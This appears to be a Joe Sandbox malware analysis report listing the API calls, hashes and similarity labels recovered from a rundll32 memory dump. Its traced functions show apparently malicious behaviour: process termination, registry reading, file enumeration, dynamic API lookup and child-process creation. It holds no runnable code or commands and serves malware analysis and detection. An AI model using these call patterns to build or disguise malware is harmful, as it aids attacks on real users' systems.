                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: HandleModule$ErrorEventExitLastThreadUsermemset
                                            • String ID:
                                            • API String ID: 3978817377-0
                                            • Opcode ID: d98a8e9d09ca3b05b1cbb284789e430e76289a78a19114aa4a42b24011a785e1
                                            • Instruction ID: 717159cd44faddba192c646409eb2842e130f16e61e2a06f5aa09698b2ef2c7a
                                            • Opcode Fuzzy Hash: d98a8e9d09ca3b05b1cbb284789e430e76289a78a19114aa4a42b24011a785e1
                                            • Instruction Fuzzy Hash: F24145B1901604AFCB209FA9D888DAABBBDFB856547648919FD07D3110DB30AE84CF25
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d4a99d5013f4d13b79fe19497eac723bebeef6f1cda805745db75ae4bfe542aa
                                            • Instruction ID: 2fba987cd5a9eb01f1ba96df0845817795599a0a1c39af6146e1e31f1d801619
                                            • Opcode Fuzzy Hash: d4a99d5013f4d13b79fe19497eac723bebeef6f1cda805745db75ae4bfe542aa
                                            • Instruction Fuzzy Hash: 184187716047159FD730AF65988A92B7BEDFB44325B004A2DFE6AC2280DB70A885CB65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 0580ADF8: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,0581A2DC,?,00000000,-00000007,0581377E,-00000007,?,00000000), ref: 0580AE07
                                              • Part of subcall function 0580ADF8: mbstowcs.NTDLL ref: 0580AE23
                                            • lstrlenW.KERNEL32(00000000,?), ref: 05802551
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(?,00000000,76C869A0,?,00000250,?,00000000), ref: 05805A60
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(?,?,00000000), ref: 05805A6C
                                              • Part of subcall function 05805A14: memset.NTDLL ref: 05805AB4
                                              • Part of subcall function 05805A14: FindFirstFileW.KERNEL32(00000000,00000000), ref: 05805ACF
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(0000002C), ref: 05805B07
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(?), ref: 05805B0F
                                              • Part of subcall function 05805A14: memset.NTDLL ref: 05805B32
                                              • Part of subcall function 05805A14: wcscpy.NTDLL ref: 05805B44
                                            • PathFindFileNameW.SHLWAPI(00000000,00000000,?,?,00000000,00000000,00000000), ref: 05802572
                                            • lstrlenW.KERNEL32(?), ref: 0580259E
                                              • Part of subcall function 05805A14: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 05805B6A
                                              • Part of subcall function 05805A14: RtlEnterCriticalSection.NTDLL(?), ref: 05805BA0
                                              • Part of subcall function 05805A14: RtlLeaveCriticalSection.NTDLL(?), ref: 05805BBC
                                              • Part of subcall function 05805A14: FindNextFileW.KERNEL32(?,00000000), ref: 05805BD5
                                              • Part of subcall function 05805A14: WaitForSingleObject.KERNEL32(00000000), ref: 05805BE7
                                              • Part of subcall function 05805A14: FindClose.KERNEL32(?), ref: 05805BFC
                                              • Part of subcall function 05805A14: FindFirstFileW.KERNEL32(00000000,00000000), ref: 05805C10
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(0000002C), ref: 05805C32
                                            • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 058025BB
                                            • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 058025DC
                                            • PathFindFileNameW.SHLWAPI(0000001E), ref: 058025F1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
                                            • String ID:
                                            • API String ID: 2670873185-0
                                            • Opcode ID: b8af21315c7cead62cf8fa84658206c0b195844d0f1df630c47f821b0f1aec82
                                            • Instruction ID: c45c8c3c94b170c2b789b2d3cc075adfd96147a577b1aead1e3394738d2a4c67
                                            • Opcode Fuzzy Hash: b8af21315c7cead62cf8fa84658206c0b195844d0f1df630c47f821b0f1aec82
                                            • Instruction Fuzzy Hash: 3E313D725043059FCB61AF68CC8886FBFEAFF88254F105929F996D3150DB31DD498B62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlen.KERNEL32(00000000,00000104,05823407,00000000,?,?,058080C4,?,?,?,00000000), ref: 05809624
                                            • lstrlen.KERNEL32(?,00000104,05823407,00000000,?,?,058080C4,?,?,?), ref: 0580963A
                                            • lstrlen.KERNEL32(?,00000104,05823407,00000000,?,?,058080C4,?,?,?), ref: 0580964F
                                            • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 058096B4
                                            • _snprintf.NTDLL ref: 058096DA
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000012,00000001,00000000), ref: 058096F9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Heap$AllocateFree_snprintf
                                            • String ID:
                                            • API String ID: 3180502281-0
                                            • Opcode ID: 0c7a0d91895cbdac11691d8712dbe3e64192e4058a9d506ee4dde99ddaa8a412
                                            • Instruction ID: 59a5bb447ddcac9170c9ac7b0667fd888dba8caeaaab7cbaefaaf7062917f59f
                                            • Opcode Fuzzy Hash: 0c7a0d91895cbdac11691d8712dbe3e64192e4058a9d506ee4dde99ddaa8a412
                                            • Instruction Fuzzy Hash: 9531BC72910218FFCF20DFA5DC8889A7FAAFF48254B018426FD15E7111CB71AD90CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 05804819
                                            • CreateWaitableTimerA.KERNEL32(05829208,?,?), ref: 05804836
                                            • GetLastError.KERNEL32(?,?), ref: 05804847
                                              • Part of subcall function 0580EEA4: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,765BD3B0,76C85520,?,?,?,058021C2,?), ref: 0580EEDC
                                              • Part of subcall function 0580EEA4: RtlAllocateHeap.NTDLL(00000000,?), ref: 0580EEF0
                                              • Part of subcall function 0580EEA4: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,058021C2,?,?,?), ref: 0580EF0A
                                              • Part of subcall function 0580EEA4: RegCloseKey.KERNEL32(?,?,?,?,058021C2,?,?,?), ref: 0580EF34
                                            • GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,?), ref: 05804887
                                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 058048A6
                                            • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 058048BC
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
                                            • String ID:
                                            • API String ID: 1835239314-0
                                            • Opcode ID: 0d0cb3ae8697abe0233efa64f603f46747f3c589c28b2c28bfdd1705ced02a69
                                            • Instruction ID: c143546ed7d164e2d56728ef4b35a9ddab7a4a35c8c495d4ffb563a60377939b
                                            • Opcode Fuzzy Hash: 0d0cb3ae8697abe0233efa64f603f46747f3c589c28b2c28bfdd1705ced02a69
                                            • Instruction Fuzzy Hash: 9E312C71950188EBCF61DF95CC8ACAEBFB9FB85750B108815FE15E6160D730AE84CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • GetModuleHandleA.KERNEL32(?,00000020,?,00008664,00001003,?,?,?,0580D0A2,?,?,?,00000000,00000000), ref: 058146ED
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0581470F
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 05814725
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0581473B
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 05814751
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 05814767
                                              • Part of subcall function 0580DDDD: memset.NTDLL ref: 0580DE5E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$AllocateHandleHeapModulememset
                                            • String ID:
                                            • API String ID: 1886625739-0
                                            • Opcode ID: c19a24bbf00ba5be5cac3a99d376a6889af4003c0da71dd733c2d59ecfb6c365
                                            • Instruction ID: f462550324692266d587460d39214bfd0c53774cf3cf6fe5d7a21d80c2d5f12b
                                            • Opcode Fuzzy Hash: c19a24bbf00ba5be5cac3a99d376a6889af4003c0da71dd733c2d59ecfb6c365
                                            • Instruction Fuzzy Hash: 63212DB560160AAFDB20DF6AC849D6ABBEDAF15324B058825ED05CB250EB74ED04CB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • StrChrA.SHLWAPI(?,00000020), ref: 05808C9A
                                            • StrChrA.SHLWAPI(00000001,00000020), ref: 05808CAB
                                              • Part of subcall function 0580BF9A: lstrlen.KERNEL32(?,?,00000000,00000000,?,0580C555,00000000,?,?,00000000,00000001), ref: 0580BFAC
                                              • Part of subcall function 0580BF9A: StrChrA.SHLWAPI(?,0000000D,?,0580C555,00000000,?,?,00000000,00000001), ref: 0580BFE4
                                            • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 05808CEB
                                            • memcpy.NTDLL(00000000,?,00000007), ref: 05808D18
                                            • memcpy.NTDLL(00000000,?,?,00000000,?,00000007), ref: 05808D27
                                            • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,?,00000007), ref: 05808D39
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memcpy$AllocateHeaplstrlen
                                            • String ID:
                                            • API String ID: 1819133394-0
                                            • Opcode ID: 53600ac4bcdcb0e6fd7a84ccde44eac4e45847b0b321d8fa671a4abd6befd845
                                            • Instruction ID: 351b4cc01d11450c2ccf23952804f4d430651c3a640fd265f12928bd93d75249
                                            • Opcode Fuzzy Hash: 53600ac4bcdcb0e6fd7a84ccde44eac4e45847b0b321d8fa671a4abd6befd845
                                            • Instruction Fuzzy Hash: E6217A72600209BFDB609B99CC85FAABBACEF18654F048152FD05DB151E770EE858BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?), ref: 05802452
                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05802463
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000,?,?,?,?), ref: 0580247E
                                            • GetLastError.KERNEL32(?,?,?,?), ref: 05802494
                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 058024A6
                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 058024BB
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
                                            • String ID:
                                            • API String ID: 1822509305-0
                                            • Opcode ID: bef3acd02122e52996ffa5d659b0ff99214f369dcfce0b60dcf9b5b351951774
                                            • Instruction ID: c9442210a0caa8d36cff565663af24a3e0d0cea91449ccec67e5d207449e4408
                                            • Opcode Fuzzy Hash: bef3acd02122e52996ffa5d659b0ff99214f369dcfce0b60dcf9b5b351951774
                                            • Instruction Fuzzy Hash: DD116D7A501028BBDF725BA5DC49CEF7F7EFF452A0B018061FD0AE2060CA715991DBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • OpenProcess.KERNEL32(00000E39,00000000,?), ref: 058032E5
                                            • _strupr.NTDLL ref: 05803320
                                            • lstrlen.KERNEL32(00000000), ref: 05803328
                                            • TerminateProcess.KERNEL32(00000000,00000000,?,00000000,?), ref: 05803367
                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 0580336E
                                            • GetLastError.KERNEL32 ref: 05803376
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
                                            • String ID:
                                            • API String ID: 110452925-0
                                            • Opcode ID: 22a2ce4aab8cc369c1565b4fa66d4683a82806dff12d03b6400e6575efdaf799
                                            • Instruction ID: 1ea1f2f866ee961de42b09f31500560fc1e337c0f97bdba5122080925796cf65
                                            • Opcode Fuzzy Hash: 22a2ce4aab8cc369c1565b4fa66d4683a82806dff12d03b6400e6575efdaf799
                                            • Instruction Fuzzy Hash: 9311B272610204EFDF60AB79AC8EDAA7F6DFB88614B019815FD07D2090DE749D908B71
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RegOpenKeyA.ADVAPI32(80000001,?), ref: 0580A93F
                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0580A96D
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0580A97F
                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0580A9A4
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0580A9BF
                                            • RegCloseKey.ADVAPI32(?), ref: 0580A9C9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: HeapQueryValue$AllocateCloseFreeOpen
                                            • String ID:
                                            • API String ID: 170146033-0
                                            • Opcode ID: fe57d85f0e15fcab54122afa49e052ac4f4498cd9f5087da4f45a5334c767038
                                            • Instruction ID: 8e1c4bd3f187eff7375cfa205580066ed03fd2ac4bb99b7d461e14c7d4ff19ef
                                            • Opcode Fuzzy Hash: fe57d85f0e15fcab54122afa49e052ac4f4498cd9f5087da4f45a5334c767038
                                            • Instruction Fuzzy Hash: 9C11C4B6A10108FFEF219B99DD89DEEBFBDEB48600B108066FD01E2114DA316E55DB20
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlen.KERNEL32(00000F00,?,-00000001,00000000,?,?,?,05804417,?,00000000,000000FF,?,00000F00), ref: 0580B876
                                            • lstrlen.KERNEL32(?,?,-00000001,00000000,?,?,?,05804417,?,00000000,000000FF,?,00000F00), ref: 0580B87D
                                            • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 0580B88F
                                            • _snprintf.NTDLL ref: 0580B8B5
                                              • Part of subcall function 0580B968: memset.NTDLL ref: 0580B97D
                                              • Part of subcall function 0580B968: lstrlenW.KERNEL32(00000000,00000000,00000000,773EDBB0,00000020,00000000), ref: 0580B9B6
                                              • Part of subcall function 0580B968: wcstombs.NTDLL ref: 0580B9C0
                                              • Part of subcall function 0580B968: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 0580B9F1
                                              • Part of subcall function 0580B968: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0580B8C3), ref: 0580BA1D
                                              • Part of subcall function 0580B968: TerminateProcess.KERNEL32(?,000003E5), ref: 0580BA33
                                              • Part of subcall function 0580B968: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0580B8C3), ref: 0580BA47
                                              • Part of subcall function 0580B968: CloseHandle.KERNEL32(?), ref: 0580BA7A
                                              • Part of subcall function 0580B968: CloseHandle.KERNEL32(?), ref: 0580BA7F
                                            • _snprintf.NTDLL ref: 0580B8E9
                                              • Part of subcall function 0580B968: GetLastError.KERNEL32 ref: 0580BA4B
                                              • Part of subcall function 0580B968: GetExitCodeProcess.KERNEL32(?,00000001), ref: 0580BA6B
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF,?,00000F00), ref: 0580B906
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
                                            • String ID:
                                            • API String ID: 1481739438-0
                                            • Opcode ID: 5d8df506f9a1b7308d5e4bbf00823c7df76d697165501d506ef1f9b26cc8f761
                                            • Instruction ID: 377760be9dc8afe23830eed5482bf95cfae76824789f19e583a7fed1c3397a1b
                                            • Opcode Fuzzy Hash: 5d8df506f9a1b7308d5e4bbf00823c7df76d697165501d506ef1f9b26cc8f761
                                            • Instruction Fuzzy Hash: 72117CB2610219BFDF219F95DC89D9E3F6DEF04360F018111FD0997261DA75AA50CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,?,05801B71,05807E45,00000057,00000000), ref: 0580A7D5
                                            • RtlAllocateHeap.NTDLL(00000000,00000009,00000001), ref: 0580A7E8
                                            • lstrcpy.KERNEL32(00000008,00000000), ref: 0580A80A
                                            • GetLastError.KERNEL32(05805EAE,00000000,00000000,?,?,05801B71,05807E45,00000057,00000000), ref: 0580A833
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,05801B71,05807E45,00000057,00000000), ref: 0580A84B
                                            • CloseHandle.KERNEL32(00000000,05805EAE,00000000,00000000,?,?,05801B71,05807E45,00000057,00000000), ref: 0580A854
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
                                            • String ID:
                                            • API String ID: 2860611006-0
                                            • Opcode ID: 7bf7cf1fa123e69c7c2b164f8d80450f8dbd3a6f2d68a869b2005f0961d495de
                                            • Instruction ID: f86dacb052ee83cd870e71acf5de0f202e0c3d7973f098abed5fe3223e8ff18a
                                            • Opcode Fuzzy Hash: 7bf7cf1fa123e69c7c2b164f8d80450f8dbd3a6f2d68a869b2005f0961d495de
                                            • Instruction Fuzzy Hash: 2A119371511309EFDB649FA5DC8A8AA7FBDFB403647008429FC5AC3250DB30AD85CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 058166CE
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,058043E4,00000F00), ref: 058166E7
                                            • GetCurrentThreadId.KERNEL32 ref: 058166F4
                                            • GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,058043E4,00000F00), ref: 05816700
                                            • GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 0581670E
                                            • lstrcpy.KERNEL32(00000000), ref: 05816730
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
                                            • String ID:
                                            • API String ID: 1175089793-0
                                            • Opcode ID: 2737aa336c16c00cfec8d4689e856ebb33caa24b6d6e4a9ca286df85696e35ad
                                            • Instruction ID: 505cfc88e22ee8cdf8b7ba12da3f93c02c061a202e98f36c51100b97af32d965
                                            • Opcode Fuzzy Hash: 2737aa336c16c00cfec8d4689e856ebb33caa24b6d6e4a9ca286df85696e35ad
                                            • Instruction Fuzzy Hash: 440184326142156B9B215BAB9C8DD6B7FACEF85A407054519FD05D3100EE70EC41C7B5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLastmemset
                                            • String ID: vids
                                            • API String ID: 3276359510-3767230166
                                            • Opcode ID: 9f2b96b21be856448ae69f1f3268e159a7bf1a7cb3d54df1d663619ef75188b4
                                            • Instruction ID: dc2fe4d03afb62e9b37c3d4ae216a06a19c179f464ba84691c439a2878947773
                                            • Opcode Fuzzy Hash: 9f2b96b21be856448ae69f1f3268e159a7bf1a7cb3d54df1d663619ef75188b4
                                            • Instruction Fuzzy Hash: 0781F7B1E112299FCF24DFA8C8849ADBBB9BF08710F10856AEC15E7250D7359D41CFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 05806F18
                                            • lstrlen.KERNEL32(?,?), ref: 05806F49
                                            • memcpy.NTDLL(00000008,?,00000001), ref: 05806F58
                                            • HeapFree.KERNEL32(00000000,00000000,?), ref: 05806FDA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateFreelstrlenmemcpy
                                            • String ID: W
                                            • API String ID: 379260646-655174618
                                            • Opcode ID: 872e01a6484094a6e4f13fa669a8e3956ce8ec1a13a169b087f26a90eef8e9e7
                                            • Instruction ID: 14bce46ab314f8c1267375b6659613ce1c643139e6b0b6279b8e2553652758bc
                                            • Opcode Fuzzy Hash: 872e01a6484094a6e4f13fa669a8e3956ce8ec1a13a169b087f26a90eef8e9e7
                                            • Instruction Fuzzy Hash: 7C41F6705043099FCB74CF5ADC84BA57FA5BB06344F10902AFD8AC7290E730D9A5CB65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • memset.NTDLL ref: 05808F0C
                                            • FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 05808F79
                                            • GetLastError.KERNEL32(?,00000000,00000000), ref: 05808F83
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: BuffersErrorFileFlushLastmemset
                                            • String ID: K$P
                                            • API String ID: 3817869962-420285281
                                            • Opcode ID: 86fbb2bf818de7c09e7f79c0cc7f6f5144dd66b3adc5b2650e844644ff220b60
                                            • Instruction ID: be3b496a1f006c23beca2aee445a2076f310345946e6fc7abfe471e30bcae737
                                            • Opcode Fuzzy Hash: 86fbb2bf818de7c09e7f79c0cc7f6f5144dd66b3adc5b2650e844644ff220b60
                                            • Instruction Fuzzy Hash: F7418F70A00705DFDB64CF74DD84A6EBBF2BF44614F54452DE886D3681D734A984CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • memcpy.NTDLL(?,058038D5,00000000,?,?,?,058038D5,?,?,?,?,?), ref: 0580F8A6
                                            • lstrlen.KERNEL32(058038D5,?,?,?,058038D5,?,?,?,?,?), ref: 0580F8C4
                                            • memcpy.NTDLL(?,?,?,?,?,?,?), ref: 0580F933
                                            • lstrlen.KERNEL32(058038D5,00000000,00000000,?,?,?,058038D5,?,?,?,?,?), ref: 0580F954
                                            • lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 0580F968
                                            • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 0580F971
                                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0580F97F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlenmemcpy$FreeLocal
                                            • String ID:
                                            • API String ID: 1123625124-0
                                            • Opcode ID: 36ed1c8b8d5997af37ee2ff563a518d00a7eb0c59bf36a8a2f6baee54e9fb134
                                            • Instruction ID: 808608512ec6902c306811abd35634a554e55a0c351fd801b4b709b12583c8ff
                                            • Opcode Fuzzy Hash: 36ed1c8b8d5997af37ee2ff563a518d00a7eb0c59bf36a8a2f6baee54e9fb134
                                            • Instruction Fuzzy Hash: 3D41147680521AAFDF21DF69DC4589B3FA9FF042A0B048425FD05A7250E731EE60CBE1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 05803AA7: ExpandEnvironmentStringsW.KERNEL32(73E806E0,00000000,00000000,73E806E0,?,80000001,05818CB5,?,73E806E0,0580407B,?,?,00000000,?), ref: 05803AB8
                                              • Part of subcall function 05803AA7: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000,?,80000001,05818CB5,?,73E806E0,0580407B,?,?,00000000,?), ref: 05803AD5
                                            • lstrlenW.KERNEL32(?,00000000,?,80000001,?,73E806E0,0580407B,?,?,00000000,?), ref: 05818CE2
                                            • lstrlenW.KERNEL32(00000008,?,80000001,?,73E806E0,0580407B,?,?,00000000,?), ref: 05818CE9
                                            • lstrlenW.KERNEL32(?,?,?,80000001,?,73E806E0,0580407B,?,?,00000000,?), ref: 05818D07
                                            • lstrlen.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 05818DC5
                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 05818DD0
                                            • wsprintfA.USER32 ref: 05818E12
                                              • Part of subcall function 0580C6B8: HeapFree.KERNEL32(00000000,00000000,05821A9A,00000000), ref: 0580C6C4
                                              • Part of subcall function 05803486: CreateFileW.KERNEL32(?,C0000000,0000FDE9,00000000,00000001,00000080,00000000,00000008,00000000,0000FDE9,?), ref: 058034C6
                                              • Part of subcall function 05803486: GetLastError.KERNEL32 ref: 058034D0
                                              • Part of subcall function 05803486: WaitForSingleObject.KERNEL32(000000C8), ref: 058034F5
                                              • Part of subcall function 05803486: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 05803518
                                              • Part of subcall function 05803486: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 05803540
                                              • Part of subcall function 05803486: WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 05803555
                                              • Part of subcall function 05803486: SetEndOfFile.KERNEL32(?), ref: 05803562
                                              • Part of subcall function 05803486: CloseHandle.KERNEL32(?), ref: 0580357A
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
